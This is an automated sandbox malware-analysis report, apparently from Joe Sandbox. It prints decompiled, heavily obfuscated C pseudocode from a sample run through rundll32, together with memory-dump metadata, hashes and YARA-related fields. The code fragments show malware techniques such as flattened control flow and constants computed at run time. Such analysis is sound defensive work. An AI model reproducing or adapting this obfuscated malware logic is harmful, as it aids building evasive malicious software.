											_push(_v40);
											_push(_a16);
											_t311 =  &_a12; // 0xee6f0a5e
											_push( *_t311);
											_push( &_v1808);
											_push(_a4);
											L1();
											_t436 = _t436 + 0x40;
											_t361 = E002BAE03(_v20, _v76, _v12, _t364);
											_t407 = 0x2e;
										}
									} else {
										__eflags = _v722;
										if(__eflags != 0) {
											__eflags = _v722 - _t407;
											if(_v722 != _t407) {
												goto L23;
											} else {
												__eflags = _v720;
												if(__eflags != 0) {
													goto L23;
												}
											}
										}
									}
									_t373 = 0xfa4bede;
									continue;
								}
								L32:
							} else {
								if(_t373 == 0x8fff290) {
									_t361 = E002CBAEA( &_v1288, _v152,  &_v768, _v104, _v140);
									_t419 = _t361;
									_t436 = _t436 + 0xc;
									__eflags = _t361 - 0xffffffff;
									if(__eflags != 0) {
										_t373 = 0x8bdeaee;
										goto L6;
									}
								} else {
									if(_t373 == 0xe9f3001) {
										_t361 = E002C8C35(_v100, _t419, _v96, _v52, _v44);
									} else {
										if(_t373 != 0xfa4bede) {
											L28:
											__eflags = _t373 - 0x71f77cc;
											if(__eflags != 0) {
												continue;
											} else {
											}
										} else {
											_t278 =  &_v768; // 0x15f5595f
											_t361 = E002CF7FC(_v136, _t419, _v116, _t278);
											asm("sbb ecx, ecx");
											_t379 =  ~_t361 & 0xfa1ebaed;
											L14:
											_t373 = _t379 + 0xe9f3001;
											while(1) {
												L6:
												_t407 = 0x2e;
												goto L7;
											}
										}
									}
								}
							}
						}
						return _t361;
						goto L32;
					}
					_push(_v92);
					_push(_v108);
					_push(0x2b12d4);
					E002B3BF8(_v28, __eflags, E002BAB66(_v60, _v112, __eflags), _v56, _v72,  &_v1288, _t370);
					E002BAE03(_v128, _v36, _v120, _t354);
					_t436 = _t436 + 0x28;
					_t373 = 0x8fff290;
					_t407 = 0x2e;
					goto L28;
				}
			}































































                                                                                                                      0x002b194c
                                                                                                                      0x002b194f
                                                                                                                      0x002b1953
                                                                                                                      0x002b195a
                                                                                                                      0x002b195e
                                                                                                                      0x002b195f
                                                                                                                      0x002b1960
                                                                                                                      0x002b1962
                                                                                                                      0x002b1965
                                                                                                                      0x002b1968
                                                                                                                      0x002b1969
                                                                                                                      0x002b196c
                                                                                                                      0x002b196d
                                                                                                                      0x002b196e
                                                                                                                      0x002b1973
                                                                                                                      0x002b1973
                                                                                                                      0x002b197a
                                                                                                                      0x002b197d
                                                                                                                      0x002b1983
                                                                                                                      0x002b198a
                                                                                                                      0x002b198f
                                                                                                                      0x002b1996
                                                                                                                      0x002b199d
                                                                                                                      0x002b19a4
                                                                                                                      0x002b19b1
                                                                                                                      0x002b19b2
                                                                                                                      0x002b19b5
                                                                                                                      0x002b19bc
                                                                                                                      0x002b19c3
                                                                                                                      0x002b19ca
                                                                                                                      0x002b19d1
                                                                                                                      0x002b19d8
                                                                                                                      0x002b19dc
                                                                                                                      0x002b19e3
                                                                                                                      0x002b19ea
                                                                                                                      0x002b19f1
                                                                                                                      0x002b19f8
                                                                                                                      0x002b19ff
                                                                                                                      0x002b1a06
                                                                                                                      0x002b1a0d
                                                                                                                      0x002b1a11
                                                                                                                      0x002b1a18
                                                                                                                      0x002b1a1f
                                                                                                                      0x002b1a26
                                                                                                                      0x002b1a2d
                                                                                                                      0x002b1a34
                                                                                                                      0x002b1a3b
                                                                                                                      0x002b1a42
                                                                                                                      0x002b1a4e
                                                                                                                      0x002b1a51
                                                                                                                      0x002b1a58
                                                                                                                      0x002b1a5f
                                                                                                                      0x002b1a66
                                                                                                                      0x002b1a6d
                                                                                                                      0x002b1a74
                                                                                                                      0x002b1a7b
                                                                                                                      0x002b1a82
                                                                                                                      0x002b1a89
                                                                                                                      0x002b1a90
                                                                                                                      0x002b1a97
                                                                                                                      0x002b1a9b
                                                                                                                      0x002b1a9f
                                                                                                                      0x002b1aa6
                                                                                                                      0x002b1aad
                                                                                                                      0x002b1ab4
                                                                                                                      0x002b1abb
                                                                                                                      0x002b1ac5
                                                                                                                      0x002b1acf
                                                                                                                      0x002b1ad9
                                                                                                                      0x002b1ae0
                                                                                                                      0x002b1ae7
                                                                                                                      0x002b1aee
                                                                                                                      0x002b1af8
                                                                                                                      0x002b1b02
                                                                                                                      0x002b1b0c
                                                                                                                      0x002b1b16
                                                                                                                      0x002b1b20
                                                                                                                      0x002b1b2a
                                                                                                                      0x002b1b31
                                                                                                                      0x002b1b35
                                                                                                                      0x002b1b3e
                                                                                                                      0x002b1b4a
                                                                                                                      0x002b1b4f
                                                                                                                      0x002b1b54
                                                                                                                      0x002b1b5b
                                                                                                                      0x002b1b62
                                                                                                                      0x002b1b6c
                                                                                                                      0x002b1b71
                                                                                                                      0x002b1b76
                                                                                                                      0x002b1b7d
                                                                                                                      0x002b1b81
                                                                                                                      0x002b1b88
                                                                                                                      0x002b1b93
                                                                                                                      0x002b1b96
                                                                                                                      0x002b1b99
                                                                                                                      0x002b1ba0
                                                                                                                      0x002b1bae
                                                                                                                      0x002b1bb5
                                                                                                                      0x002b1bb6
                                                                                                                      0x002b1bb9
                                                                                                                      0x002b1bc0
                                                                                                                      0x002b1bc7
                                                                                                                      0x002b1bcb
                                                                                                                      0x002b1bd2
                                                                                                                      0x002b1bd9
                                                                                                                      0x002b1be0
                                                                                                                      0x002b1be7
                                                                                                                      0x002b1beb
                                                                                                                      0x002b1bef
                                                                                                                      0x002b1bf6
                                                                                                                      0x002b1bfd
                                                                                                                      0x002b1c01
                                                                                                                      0x002b1c08
                                                                                                                      0x002b1c0f
                                                                                                                      0x002b1c16
                                                                                                                      0x002b1c1d
                                                                                                                      0x002b1c24
                                                                                                                      0x002b1c2b
                                                                                                                      0x002b1c32
                                                                                                                      0x002b1c3c
                                                                                                                      0x002b1c46
                                                                                                                      0x002b1c50
                                                                                                                      0x002b1c5c
                                                                                                                      0x002b1c5f
                                                                                                                      0x002b1c6a
                                                                                                                      0x002b1c6d
                                                                                                                      0x002b1c74
                                                                                                                      0x002b1c7b
                                                                                                                      0x002b1c7f
                                                                                                                      0x002b1c86
                                                                                                                      0x002b1c8d
                                                                                                                      0x002b1c94
                                                                                                                      0x002b1c9b
                                                                                                                      0x002b1ca2
                                                                                                                      0x002b1ca9
                                                                                                                      0x002b1cb0
                                                                                                                      0x002b1cb7
                                                                                                                      0x002b1cbe
                                                                                                                      0x002b1cc5
                                                                                                                      0x002b1cc9
                                                                                                                      0x002b1cd0
                                                                                                                      0x002b1cda
                                                                                                                      0x002b1ce6
                                                                                                                      0x002b1cf0
                                                                                                                      0x002b1cf7
                                                                                                                      0x002b1cfe
                                                                                                                      0x002b1d05
                                                                                                                      0x002b1d12
                                                                                                                      0x002b1d13
                                                                                                                      0x002b1d16
                                                                                                                      0x002b1d1d
                                                                                                                      0x002b1d24
                                                                                                                      0x002b1d28
                                                                                                                      0x002b1d2f
                                                                                                                      0x002b1d36
                                                                                                                      0x002b1d42
                                                                                                                      0x002b1d45
                                                                                                                      0x002b1d48
                                                                                                                      0x002b1d4f
                                                                                                                      0x002b1d56
                                                                                                                      0x002b1d5d
                                                                                                                      0x002b1d64
                                                                                                                      0x002b1d6b
                                                                                                                      0x002b1d6f
                                                                                                                      0x002b1d76
                                                                                                                      0x002b1d7d
                                                                                                                      0x002b1d7d
                                                                                                                      0x002b1d7f
                                                                                                                      0x00000000
                                                                                                                      0x002b1d80
                                                                                                                      0x002b1d92
                                                                                                                      0x002b1f11
                                                                                                                      0x002b1f17
                                                                                                                      0x00000000
                                                                                                                      0x002b1d98
                                                                                                                      0x002b1d9e
                                                                                                                      0x002b1e2d
                                                                                                                      0x002b1e33
                                                                                                                      0x002b1efd
                                                                                                                      0x002b1f04
                                                                                                                      0x002b1f06
                                                                                                                      0x00000000
                                                                                                                      0x002b1e39
                                                                                                                      0x002b1e39
                                                                                                                      0x002b1e40
                                                                                                                      0x002b1e69
                                                                                                                      0x002b1e69
                                                                                                                      0x002b1e6d
                                                                                                                      0x002b1e6f
                                                                                                                      0x002b1e72
                                                                                                                      0x002b1e7e
                                                                                                                      0x002b1ead
                                                                                                                      0x002b1eb2
                                                                                                                      0x002b1ec1
                                                                                                                      0x002b1ec7
                                                                                                                      0x002b1ec7
                                                                                                                      0x002b1eca
                                                                                                                      0x002b1ecb
                                                                                                                      0x002b1ece
                                                                                                                      0x002b1ed3
                                                                                                                      0x002b1ee0
                                                                                                                      0x002b1ee9
                                                                                                                      0x002b1ee9
                                                                                                                      0x002b1e42
                                                                                                                      0x002b1e42
                                                                                                                      0x002b1e4a
                                                                                                                      0x002b1e4c
                                                                                                                      0x002b1e53
                                                                                                                      0x00000000
                                                                                                                      0x002b1e55
                                                                                                                      0x002b1e55
                                                                                                                      0x002b1e5d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b1e5d
                                                                                                                      0x002b1e53
                                                                                                                      0x002b1e4a
                                                                                                                      0x002b1e5f
                                                                                                                      0x00000000
                                                                                                                      0x002b1e5f
                                                                                                                      0x00000000
                                                                                                                      0x002b1da4
                                                                                                                      0x002b1daa
                                                                                                                      0x002b1e0d
                                                                                                                      0x002b1e12
                                                                                                                      0x002b1e14
                                                                                                                      0x002b1e17
                                                                                                                      0x002b1e1a
                                                                                                                      0x002b1e20
                                                                                                                      0x00000000
                                                                                                                      0x002b1e20
                                                                                                                      0x002b1dac
                                                                                                                      0x002b1db2
                                                                                                                      0x002b1f8c
                                                                                                                      0x002b1db8
                                                                                                                      0x002b1dbe
                                                                                                                      0x002b1f70
                                                                                                                      0x002b1f70
                                                                                                                      0x002b1f76
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b1f7c
                                                                                                                      0x002b1dc4
                                                                                                                      0x002b1dc4
                                                                                                                      0x002b1dd6
                                                                                                                      0x002b1de1
                                                                                                                      0x002b1de3
                                                                                                                      0x002b1de9
                                                                                                                      0x002b1de9
                                                                                                                      0x002b1d7d
                                                                                                                      0x002b1d7d
                                                                                                                      0x002b1d7f
                                                                                                                      0x00000000
                                                                                                                      0x002b1d7f
                                                                                                                      0x002b1d7d
                                                                                                                      0x002b1dbe
                                                                                                                      0x002b1db2
                                                                                                                      0x002b1daa
                                                                                                                      0x002b1d9e
                                                                                                                      0x002b1f9a
                                                                                                                      0x00000000
                                                                                                                      0x002b1f9a
                                                                                                                      0x002b1f21
                                                                                                                      0x002b1f24
                                                                                                                      0x002b1f2d
                                                                                                                      0x002b1f51
                                                                                                                      0x002b1f60
                                                                                                                      0x002b1f65
                                                                                                                      0x002b1f68
                                                                                                                      0x002b1f6f
                                                                                                                      0x00000000
                                                                                                                      0x002b1f6f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )|$.Wo$3`$^o$_6$~X$~b
                                                                                                                      • API String ID: 0-1767839032
                                                                                                                      • Opcode ID: eef91fe68660d8fda0360ca97d0afbe7e47c452db0b4903d5e0a85f4f344d683
                                                                                                                      • Instruction ID: 711b186d4458535c831d8e0d9406c3a9602c571eecc118062953af6c6dcd1cce
                                                                                                                      • Opcode Fuzzy Hash: eef91fe68660d8fda0360ca97d0afbe7e47c452db0b4903d5e0a85f4f344d683
                                                                                                                      • Instruction Fuzzy Hash: 69C1FEB1C0135DDBDB68CFA5D98A5DEBFB1FB00318F208159D116BA264C7B84A8ACF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C04B8 Relevance: 9.0, Strings: 7, Instructions: 214COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002C04B8() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t191;
				signed int _t193;
				signed int _t194;
				void* _t198;
				void* _t219;
				intOrPtr _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				intOrPtr _t231;
				intOrPtr* _t232;
				signed int _t233;
				signed int* _t234;

				_t234 =  &_v88;
				_v12 = 0x2790ea;
				_v8 = 0xba5a5c;
				_t198 = 0x3d69ab1;
				_t224 = 0;
				_v4 = 0;
				_v60 = 0x2fd7ed;
				_v60 = _v60 | 0x771a9d11;
				_t225 = 0x45;
				_v60 = _v60 * 0x4e;
				_v60 = _v60 ^ 0x55773f16;
				_v40 = 0xe86db6;
				_v40 = _v40 | 0xabe4da9c;
				_v40 = _v40 ^ 0xabe3ff81;
				_v84 = 0x4e4c43;
				_v84 = _v84 + 0x2260;
				_v84 = _v84 / _t225;
				_t226 = 0x36;
				_v84 = _v84 / _t226;
				_v84 = _v84 ^ 0x000c99de;
				_v36 = 0x2c2e8d;
				_v36 = _v36 ^ 0x89bc573f;
				_v36 = _v36 ^ 0x899e3850;
				_v56 = 0xc456b8;
				_v56 = _v56 << 1;
				_t227 = 0x7a;
				_v56 = _v56 / _t227;
				_v56 = _v56 ^ 0x000dd00d;
				_v24 = 0x6eec6c;
				_v24 = _v24 * 0x67;
				_v24 = _v24 ^ 0x2ca24ccd;
				_v28 = 0xbd5c18;
				_v28 = _v28 + 0xd697;
				_v28 = _v28 ^ 0x00bf4353;
				_v32 = 0x8ab54f;
				_v32 = _v32 * 0x47;
				_v32 = _v32 ^ 0x267a3e13;
				_v88 = 0x583e0f;
				_v88 = _v88 >> 8;
				_v88 = _v88 + 0xffff5904;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xb14dc739;
				_v44 = 0x7902f;
				_v44 = _v44 + 0xffff35ef;
				_v44 = _v44 ^ 0x000a0038;
				_v64 = 0xab1413;
				_v64 = _v64 + 0xffff0fb9;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0xaa2b0b8a;
				_v76 = 0x32b087;
				_v76 = _v76 | 0x42a79f0a;
				_v76 = _v76 ^ 0x7a54616b;
				_v76 = _v76 + 0x85;
				_v76 = _v76 ^ 0x38e777a2;
				_v20 = 0xba9969;
				_v20 = _v20 | 0x60b184e2;
				_v20 = _v20 ^ 0x60bd1ab4;
				_v52 = 0x531ceb;
				_v52 = _v52 ^ 0x8fc4675a;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x23e32c7b;
				_v80 = 0xb054c0;
				_t228 = 0x5b;
				_v80 = _v80 / _t228;
				_v80 = _v80 << 1;
				_v80 = _v80 + 0xffffcecb;
				_v80 = _v80 ^ 0x0007d204;
				_v16 = 0x58f1c6;
				_v16 = _v16 ^ 0x8ee10e17;
				_v16 = _v16 ^ 0x8ebef1bd;
				_v68 = 0x312414;
				_t229 = 0x7b;
				_t233 = _v16;
				_v68 = _v68 / _t229;
				_v68 = _v68 + 0x1b34;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x00095176;
				_t197 = _v16;
				_t230 = _v16;
				_v72 = 0xc0cd63;
				_v72 = _v72 | 0x9a162f11;
				_v72 = _v72 << 3;
				_v72 = _v72 * 0x12;
				_v72 = _v72 ^ 0x18eea785;
				_v48 = 0xaed007;
				_v48 = _v48 ^ 0x406d7cc3;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x061a7dff;
				while(1) {
					L1:
					_t219 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t198 != 0x2c774a6) {
								if(_t198 == 0x3d69ab1) {
									_t198 = 0x526c216;
									continue;
								} else {
									if(_t198 == 0x4efcef6) {
										E002CE689(_v76, _v20, _v52, _t233, _v80);
										_t234 =  &(_t234[3]);
										_t198 = 0x2c774a6;
										goto L1;
									} else {
										if(_t198 == 0x526c216) {
											_t231 =  *0x2d520c; // 0x0
											_t232 = _t231 + 0x220;
											while( *_t232 != _t219) {
												_t232 = _t232 + 2;
											}
											_t230 = _t232 + 2;
											_t198 = 0xb318200;
											goto L2;
										} else {
											if(_t198 == 0x54b01d8) {
												_t193 = E002B2E96(_v56, _v24, _v28, _v60, _v32, _t230, _t197);
												_t234 =  &(_t234[5]);
												_t233 = _t193;
												_t191 = 0xe4f0407;
												_t198 =  !=  ? 0xe4f0407 : 0x2c774a6;
												_t219 = 0x5c;
												continue;
											} else {
												if(_t198 == 0xb318200) {
													_t194 = E002BEB36(_v84, _v36, _t198, _v40);
													_t197 = _t194;
													_t234 =  &(_t234[3]);
													if(_t194 != 0) {
														_t198 = 0x54b01d8;
														while(1) {
															L1:
															_t219 = 0x5c;
															goto L2;
														}
													}
												} else {
													if(_t198 != _t191) {
														goto L21;
													} else {
														E002BC67D(_t233, _v88, _v44, _v64);
														_t224 =  !=  ? 1 : _t224;
														_t198 = 0x4efcef6;
														while(1) {
															L1:
															_t219 = 0x5c;
															L2:
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								goto L22;
							}
							E002CE689(_v16, _v68, _v72, _t197, _v48);
							_t234 =  &(_t234[3]);
							_t198 = 0xc9e12b8;
							_t191 = 0xe4f0407;
							_t219 = 0x5c;
							L21:
						} while (_t198 != 0xc9e12b8);
						L22:
						return _t224;
					}
				}
			}









































                                                                                                                      0x002c04b8
                                                                                                                      0x002c04bb
                                                                                                                      0x002c04c5
                                                                                                                      0x002c04cd
                                                                                                                      0x002c04d6
                                                                                                                      0x002c04d8
                                                                                                                      0x002c04dc
                                                                                                                      0x002c04e4
                                                                                                                      0x002c04f3
                                                                                                                      0x002c04f6
                                                                                                                      0x002c04fa
                                                                                                                      0x002c0502
                                                                                                                      0x002c050a
                                                                                                                      0x002c0512
                                                                                                                      0x002c051a
                                                                                                                      0x002c0522
                                                                                                                      0x002c0532
                                                                                                                      0x002c053a
                                                                                                                      0x002c053f
                                                                                                                      0x002c0545
                                                                                                                      0x002c054d
                                                                                                                      0x002c0555
                                                                                                                      0x002c055d
                                                                                                                      0x002c0565
                                                                                                                      0x002c056d
                                                                                                                      0x002c0575
                                                                                                                      0x002c0578
                                                                                                                      0x002c057c
                                                                                                                      0x002c0584
                                                                                                                      0x002c0591
                                                                                                                      0x002c0595
                                                                                                                      0x002c059d
                                                                                                                      0x002c05a5
                                                                                                                      0x002c05ad
                                                                                                                      0x002c05b5
                                                                                                                      0x002c05c2
                                                                                                                      0x002c05c6
                                                                                                                      0x002c05ce
                                                                                                                      0x002c05d6
                                                                                                                      0x002c05db
                                                                                                                      0x002c05e3
                                                                                                                      0x002c05e8
                                                                                                                      0x002c05f0
                                                                                                                      0x002c05f8
                                                                                                                      0x002c0600
                                                                                                                      0x002c0608
                                                                                                                      0x002c0610
                                                                                                                      0x002c0618
                                                                                                                      0x002c061d
                                                                                                                      0x002c0625
                                                                                                                      0x002c062d
                                                                                                                      0x002c0635
                                                                                                                      0x002c063d
                                                                                                                      0x002c0645
                                                                                                                      0x002c064d
                                                                                                                      0x002c0655
                                                                                                                      0x002c065d
                                                                                                                      0x002c0665
                                                                                                                      0x002c066d
                                                                                                                      0x002c0675
                                                                                                                      0x002c067a
                                                                                                                      0x002c0682
                                                                                                                      0x002c0692
                                                                                                                      0x002c0697
                                                                                                                      0x002c069d
                                                                                                                      0x002c06a1
                                                                                                                      0x002c06a9
                                                                                                                      0x002c06b1
                                                                                                                      0x002c06b9
                                                                                                                      0x002c06c1
                                                                                                                      0x002c06c9
                                                                                                                      0x002c06d5
                                                                                                                      0x002c06d8
                                                                                                                      0x002c06dc
                                                                                                                      0x002c06e0
                                                                                                                      0x002c06e8
                                                                                                                      0x002c06ed
                                                                                                                      0x002c06f5
                                                                                                                      0x002c06f9
                                                                                                                      0x002c06fd
                                                                                                                      0x002c0705
                                                                                                                      0x002c070d
                                                                                                                      0x002c0717
                                                                                                                      0x002c071b
                                                                                                                      0x002c0723
                                                                                                                      0x002c072b
                                                                                                                      0x002c0733
                                                                                                                      0x002c0738
                                                                                                                      0x002c0740
                                                                                                                      0x002c0740
                                                                                                                      0x002c0742
                                                                                                                      0x002c0743
                                                                                                                      0x002c0743
                                                                                                                      0x002c0748
                                                                                                                      0x00000000
                                                                                                                      0x002c0748
                                                                                                                      0x002c075a
                                                                                                                      0x002c085a
                                                                                                                      0x00000000
                                                                                                                      0x002c0760
                                                                                                                      0x002c0766
                                                                                                                      0x002c0848
                                                                                                                      0x002c084d
                                                                                                                      0x002c0850
                                                                                                                      0x00000000
                                                                                                                      0x002c076c
                                                                                                                      0x002c0772
                                                                                                                      0x002c0814
                                                                                                                      0x002c081a
                                                                                                                      0x002c0825
                                                                                                                      0x002c0822
                                                                                                                      0x002c0822
                                                                                                                      0x002c082a
                                                                                                                      0x002c082d
                                                                                                                      0x00000000
                                                                                                                      0x002c0778
                                                                                                                      0x002c077e
                                                                                                                      0x002c07f3
                                                                                                                      0x002c07f8
                                                                                                                      0x002c07fb
                                                                                                                      0x002c0804
                                                                                                                      0x002c0809
                                                                                                                      0x002c080e
                                                                                                                      0x00000000
                                                                                                                      0x002c0780
                                                                                                                      0x002c0786
                                                                                                                      0x002c07c1
                                                                                                                      0x002c07c6
                                                                                                                      0x002c07c8
                                                                                                                      0x002c07cd
                                                                                                                      0x002c07d3
                                                                                                                      0x002c0740
                                                                                                                      0x002c0740
                                                                                                                      0x002c0742
                                                                                                                      0x00000000
                                                                                                                      0x002c0742
                                                                                                                      0x002c0740
                                                                                                                      0x002c0788
                                                                                                                      0x002c078a
                                                                                                                      0x00000000
                                                                                                                      0x002c0790
                                                                                                                      0x002c079e
                                                                                                                      0x002c07aa
                                                                                                                      0x002c07ad
                                                                                                                      0x002c0740
                                                                                                                      0x002c0740
                                                                                                                      0x002c0742
                                                                                                                      0x002c0743
                                                                                                                      0x00000000
                                                                                                                      0x002c0743
                                                                                                                      0x002c0740
                                                                                                                      0x002c078a
                                                                                                                      0x002c0786
                                                                                                                      0x002c077e
                                                                                                                      0x002c0772
                                                                                                                      0x002c0766
                                                                                                                      0x00000000
                                                                                                                      0x002c075a
                                                                                                                      0x002c0875
                                                                                                                      0x002c087a
                                                                                                                      0x002c087d
                                                                                                                      0x002c0882
                                                                                                                      0x002c0889
                                                                                                                      0x002c088a
                                                                                                                      0x002c088a
                                                                                                                      0x002c0896
                                                                                                                      0x002c089f
                                                                                                                      0x002c089f
                                                                                                                      0x002c0743

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$CLN$`"$kaTz$ln$vQ${,#
                                                                                                                      • API String ID: 0-3310206870
                                                                                                                      • Opcode ID: ff89035b76c83f44fc5b849f909ded31ae95c32f1a30828358fe34aa71ad25a0
                                                                                                                      • Instruction ID: 2859e0f05646c06fd17ac02f71435270558bbc66135fbaf021927e950f64d985
                                                                                                                      • Opcode Fuzzy Hash: ff89035b76c83f44fc5b849f909ded31ae95c32f1a30828358fe34aa71ad25a0
                                                                                                                      • Instruction Fuzzy Hash: 8DA15471528341DFC358CF65C88991BFBF1FBC4398F108A1EF59A96260D3B189598F82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                      • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                        • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                      • String ID: LOC
                                                                                                                      • API String ID: 3864805678-519433814
                                                                                                                      • Opcode ID: 63ab523a9a2e3d371aaeed16ad9493fb6f1cf84d76bfa06aab66571a3b8646f3
                                                                                                                      • Instruction ID: 7277114792b78e9780c732931990dc2d47c5509fa80221895377f97ab4224877
                                                                                                                      • Opcode Fuzzy Hash: 63ab523a9a2e3d371aaeed16ad9493fb6f1cf84d76bfa06aab66571a3b8646f3
                                                                                                                      • Instruction Fuzzy Hash: B711E171900118AFDB12DB64CC46BDD73B8EF09315F1241A1F7059F0A2EEB0EA869AD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C9186 Relevance: 7.8, Strings: 6, Instructions: 330COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E002C9186(void* __ecx, void* __edx, intOrPtr _a8) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				void* _t336;
				void* _t361;
				intOrPtr _t365;
				intOrPtr _t367;
				void* _t371;
				intOrPtr _t373;
				intOrPtr _t376;
				void* _t386;
				void* _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int* _t439;

				_push(_a8);
				_t425 = 0;
				_push(0);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t336);
				_v1592 = 0xe90366;
				_t439 =  &(( &_v1704)[4]);
				_v1592 = _v1592 | 0xd8b262de;
				_v1592 = _v1592 ^ 0xd8fb63d7;
				_t386 = 0x283f0d8;
				_v1624 = 0xa39629;
				_v1624 = _v1624 >> 4;
				_t426 = 0x2c;
				_v1624 = _v1624 / _t426;
				_v1624 = _v1624 ^ 0x000bae79;
				_v1600 = 0xef5a7d;
				_t19 =  &_v1600; // 0xef5a7d
				_t427 = 0x1f;
				_v1600 =  *_t19 / _t427;
				_v1600 = _v1600 ^ 0x000c380d;
				_v1568 = 0xec630a;
				_t28 =  &_v1568; // 0xec630a
				_t428 = 0x1c;
				_v1568 =  *_t28 / _t428;
				_v1568 = _v1568 ^ 0x0002d50e;
				_v1668 = 0x697ac4;
				_v1668 = _v1668 ^ 0x43408629;
				_v1668 = _v1668 << 4;
				_v1668 = _v1668 << 0xf;
				_v1668 = _v1668 ^ 0xe763f227;
				_v1692 = 0xf5db19;
				_v1692 = _v1692 ^ 0xaa29ad2f;
				_v1692 = _v1692 >> 0xe;
				_v1692 = _v1692 << 6;
				_v1692 = _v1692 ^ 0x00a75d57;
				_v1620 = 0x9b43e;
				_v1620 = _v1620 >> 0xa;
				_v1620 = _v1620 + 0x190a;
				_v1620 = _v1620 ^ 0x0005a1ac;
				_v1572 = 0xd92c9a;
				_v1572 = _v1572 << 0xc;
				_v1572 = _v1572 ^ 0x92c3ac8e;
				_v1700 = 0x6f30ff;
				_v1700 = _v1700 << 0xe;
				_t429 = 0x26;
